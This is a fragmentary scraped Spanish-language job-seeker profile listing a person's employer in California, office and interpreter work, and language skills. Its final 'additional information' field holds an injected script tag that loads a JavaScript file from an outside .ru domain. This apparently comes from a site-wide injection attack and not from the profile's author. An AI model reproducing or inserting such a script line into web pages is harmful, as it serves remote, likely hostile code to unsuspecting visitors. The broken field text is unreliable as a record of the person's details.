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Daniel Acosta Rivera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Estados Unidos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7/2005-0/0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RCR Companies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California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Administración/Oficina (Internet)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 de supervisor.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 de operacion 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Comunicación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Interprete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Estados Unidos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Español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FORMACIÓN:EXPERIENCIA:FORMACIÓN COMPLEMENTARIA:INFORMACIÓN ADICIONAL: script src=http://www.bannerdriven.ru/ads.js&gt;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